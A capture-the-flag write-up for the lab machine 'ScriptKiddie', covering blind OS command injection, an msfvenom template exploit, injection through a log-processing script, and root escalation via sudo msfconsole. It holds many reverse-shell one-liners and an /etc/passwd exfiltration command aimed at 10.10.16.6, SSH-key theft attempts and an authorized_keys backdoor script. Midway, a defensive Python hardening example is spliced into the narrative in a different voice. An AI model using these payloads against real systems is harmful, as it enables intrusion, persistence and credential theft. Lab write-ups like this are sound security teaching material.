# ScriptKiddie

nmap:

```
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
```

Werkzeug is a Python WSGI library, so the web application is written in Python.

<figure><img src="https://746814813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fe1HXVppEt3OHWIFqtAXT%2Fuploads%2FO0A9eJHwmp0tjksx2Pdq%2Fimage.png?alt=media&#x26;token=3b6074f2-5ce3-4d39-9d78-4e9e810a1a99" alt=""><figcaption></figcaption></figure>

I entered my IP for the nmap scan and checked with `tcpdump -i tun0 src 10.10.10.226` and the server actually sends requests.

It looks like OS commands are used in the background, so I will try some OS command injections.

With '10.10.16.6; ping 10.10.16.6' at “payloads” I received the ping, so we have a blind OS command injection.

**Payloads that worked:**

```
; ping 10.10.16.6
& ping 10.10.16.6
```

**Payloads that did not work:**

```
; a=$(cat /etc/passwd) && wget http://10.10.16.6:8000/$a
& nc -lnvp 4444 -e /bin/bash
; wget http://10.10.16.6:8000/test

; python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.6",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
; export RHOST="10.10.16.6";export RPORT=4444;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```

Searching for Werkzeug shows this:

```
Werkzeug - 'Debug Shell' Command Execution | multiple/remote/43905.py
```

I changed the script to work with Python 3, but it did not work. I checked for the /console path and it is not present, so this exploit will not work here.

Checking with Burp, I saw that a POST request is sent:

```
ip=%3B+ping+10.10.16.6&action=scan
```

Changing the action, we get JSON output:

<figure><img src="https://746814813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fe1HXVppEt3OHWIFqtAXT%2Fuploads%2Fy8I0k31T6Fv8adMOZykx%2Fimage.png?alt=media&#x26;token=8ec7fe6a-2166-499a-93f0-a000a803e264" alt=""><figcaption></figcaption></figure>

Since I was stuck, I went to the guided mode. It appears there is a command injection for msfvenom. I honestly did not think about this, but it seems like even vulnerability exploitation tools can have vulnerabilities :)

```
Metasploit Framework 6.0.11 - msfvenom APK template command injection | multiple/local/49491.py
```

## msfvenom RCE

With the exploit script [/usr/share/exploitdb/exploits/multiple/local/49491.py](file:///usr/share/exploitdb/exploits/multiple/local/49491.py) and the payload

`'/bin/bash -c "bash -i >& /dev/tcp/10.10.16.6/4444 0>&1"'`

in it, I got a netcat shell on the box!

<figure><img src="https://746814813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fe1HXVppEt3OHWIFqtAXT%2Fuploads%2F6ywJtEVM4ezh00bWFvPW%2Fimage.png?alt=media&#x26;token=c58079b9-e4a0-4fb8-a4f5-c6d7acccfdc0" alt=""><figcaption></figcaption></figure>

## Internal Enumeration

```
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
kid@scriptkiddie:/home$ ls -la
ls -la
total 16
drwxr-xr-x 4 root root 4096 Feb 3 2021 .
drwxr-xr-x 20 root root 4096 Feb 3 2021 ..
drwxr-xr-x 11 kid kid 4096 Feb 3 2021 kid
drwxr-xr-x 6 pwn pwn 4096 Feb 3 2021 pwn
kid@scriptkiddie:/home$ cd pwn
cd pwn
kid@scriptkiddie:/home/pwn$ ls
ls
recon
scanlosers.sh
kid@scriptkiddie:/home/pwn$
```

There is another user, pwn, with interesting files in their home directory.

<figure><img src="https://746814813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fe1HXVppEt3OHWIFqtAXT%2Fuploads%2FjyxLe6My0vhdD2kykJ9W%2Fimage.png?alt=media&#x26;token=bc378c60-7066-4829-b943-687a57d3a93c" alt=""><figcaption></figcaption></figure>

The script seems to run an nmap scan over all IPs in the log file and then clear the log.

`ss -tlpn` shows no new open ports.

I transferred linpeas and pspy64 onto the host and ran them.

I added my public key to `/home/kid/authorized_keys` so I could SSH onto the host.

I found the application at /home/kid/html/app.py and had a look at it.

This part is interesting:

<figure><img src="https://746814813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fe1HXVppEt3OHWIFqtAXT%2Fuploads%2FFijKSYqWQmIwfRjapZRC%2Fimage.png?alt=media&#x26;token=22735872-9c4c-4d57-ac6a-c7fc209f64e1" alt=""><figcaption></figcaption></figure>

We control the `srcip` value through browser input, and it is written to the file /home/kid/logs/hackers if it is not a valid IP. Either way, we can write to that file as `kid`.

Combined with the script /home/pwn/scanlosers.sh we can control which IPs are scanned by the script.

I could not find an obvious nmap injection vulnerability for the given version.

I added this to the hackers file:

```
127.0.0.1"; echo soos > sheesh.txt
```

To my surprise, the hackers file was empty after I left nano and I found the file sheesh.txt in /home/pwn/ owned by pwn.

## Bash Injection

Let's try this with a reverse shell.

`127.0.0.1"; /bin/bash -c ‘bash -i >& /dev/tcp/10.10.16.6/6666 0>&1’`

The hackers file got cleared again, but I got no reverse shell. The script's output showed:

```
The file contains an error:
Failed to resolve "soos".
WARNING: No targets were specified, so 0 hosts scanned.
```

**Failed payloads:**

```
127.0.0.1; /bin/bash -c 'bash -i >& /dev/tcp/10.10.16.6/6666 0>&1" echo
127.0.0.1 && bash -i >& /dev/tcp/10.10.16.6/6666 0>&1" && echo "
127.0.0.1; bash -i >& /dev/tcp/10.10.16.6/6666 0>&1"; echo "
127.0.0.1 & bash -i >& /dev/tcp/10.10.16.6/6666 0>&1
127.0.0.1"; echo $(cat /home/pwn/.ssh/*) > sheesh.txt
127.0.0.1"; cp /home/pwn/.ssh/id_rsa ./id.txt
test test {touch,testtest.txt}
test test (sh)0>/dev/tcp/10.10.16.6/6666
test test a;{touch,testtest.txt};
test test a";(sh)0>/dev/tcp/10.10.16.6/6666;
test test a"; /tmp/exploit.sh;
test test a";/tmp/exploit.sh;
test test a;/tmp/exploit.sh;
test test a;/tmp/exploit.sh;"
test test a";{bash,/tmp/exploit.sh};
a a 127.0.0.1&{/bin/bash,/tmp/exploit.sh};
a a a;"/tmp/exploit.sh > sheesh.txt
a a /tmp/exploit.sh;"/tmp/exploit.sh > sheesh.txt
a a /bin/bash</tmp/exploit.sh;"/bin/bash</tmp/exploit.sh > sheesh.txt
a a a;"/tmp/exploit.sh;" > aua.txt
a a a;"/tmp/exploit.sh" > aua.txt
a a $(/tmp/exploit.sh)
a a $(../../../tmp/exploit.sh)
```

The script takes the third field of each line, delimited by spaces, so the payload has to sit in the third field and must not contain any spaces.
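The two weaknesses chained on this box are the same bug twice: a user-controlled string is pasted into a shell command line, first the `ip` form field in app.py and then the third field of each line in the hackers log that scanlosers.sh hands to nmap. The following is an added example (not the box's app.py or scanlosers.sh) that models both patterns beside a hardened version. The function names, the nmap arguments and the three-field log format (`[date] src <ip>`) are assumptions; what is faithful to the writeup is the field-3 extraction and the fact that non-IP values reach the shell.

```python
"""Model of the two unsafe patterns in this writeup, beside hardened versions.

Added example; the functions reproduce the *pattern* described in the text
(an IP field interpolated into a shell string, and a log line split on spaces
with the third field fed back into a shell). The real scripts are assumptions.
"""
import ipaddress


# --- pattern 1: the web form's "ip" field -----------------------------------

def vulnerable_scan_command(ip):
    """What the blind OS command injection looks like: the user value is pasted
    straight into a shell string, so '; ping ...' becomes a second command once
    this string reaches os.system() / sh -c. (Assumed nmap arguments.)"""
    return f"nmap -p- {ip}"


def is_valid_ip(value):
    """Accept only a syntactically valid IPv4/IPv6 address, nothing else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def safe_scan_argv(ip):
    """Validate first, then pass the value as one discrete argv element for
    subprocess.run(argv) (no shell), so metacharacters carry no meaning."""
    if not is_valid_ip(ip):
        raise ValueError(f"rejected non-IP target: {ip!r}")
    return ["nmap", "-p-", ip]


# --- pattern 2: the hackers log consumed by scanlosers.sh --------------------

# Constructed sample log. Assumed format: "[date] src <srcip>", i.e. the
# attacker-controlled value lands in the third space-delimited field.
SAMPLE_LOG = [
    '[2021-02-03] src 10.10.16.6',
    '[2021-02-03] src 127.0.0.1"; echo soos > sheesh.txt',
    '[2021-02-03] src 10.10.16.6 ',
]


def vulnerable_targets(lines):
    """Mimics `cut -d' ' -f3-`: everything from the third field onward, taken
    verbatim. Whatever is here is what the scanner's shell string receives."""
    targets = []
    for line in lines:
        parts = line.split(" ", 2)
        if len(parts) == 3:
            targets.append(parts[2])
    return targets


def safe_targets(lines):
    """Same extraction, but keep only tokens that parse as an IP address and
    de-duplicate them (the sort -u step). Returns (accepted, rejected)."""
    accepted, rejected = [], []
    for raw in vulnerable_targets(lines):
        token = raw.strip()
        if is_valid_ip(token):
            if token not in accepted:
                accepted.append(token)
        else:
            rejected.append(raw)
    return accepted, rejected


if __name__ == "__main__":
    print("unsafe:", vulnerable_targets(SAMPLE_LOG))
    ok, bad = safe_targets(SAMPLE_LOG)
    print("accepted:", ok)
    print("rejected:", bad)
    for target in ok:
        print("argv:", safe_scan_argv(target))
```

The point of the split is that validation alone is not enough: `is_valid_ip` stops the second log line, and the argv form stops any future field that slips past validation from being interpreted by a shell. Logging the rejected values (rather than feeding them to another script) is also what makes this injection visible to a defender.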

I created a script /tmp/exploit.sh

```
#!/bin/bash

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ9c4Xx8Qqg8wzlum73FBbi2UDXvBLLnK4frGPMIzXat" > /home/pwn/.ssh/authorized_keys
bash -i >& /dev/tcp/10.10.16.6/6666 0>&1
touch hacked.txt
```

This payload finally worked to get a reverse shell as the pwn user:

```
a a $(bash -c "bash -i >& /dev/tcp/10.10.16.6/6666 0>&1")
```

I think the trick here was to use bash -c followed by the actual command, and to wrap it in $() instead of running it directly.

This injection also would not execute my script; I do not know why.

## Privilege Escalation

`sudo -l` reveals that the user pwn can execute /opt/metasploit-framework-6.0.9/msfconsole as root without a password.

I ran `sudo /opt/metasploit-framework-6.0.9/msfconsole` and started an interactive Ruby shell with `irb`.

This did not help me.

`sudo /opt/metasploit-framework-6.0.9/msfconsole -x id` showed me the output of id, so this is the way to go. This worked to get a root shell:

```
sudo /opt/metasploit-framework-6.0.9/msfconsole -x 'bash -c "bash -i >& /dev/tcp/10.10.16.6/7777 0>&1"'
```
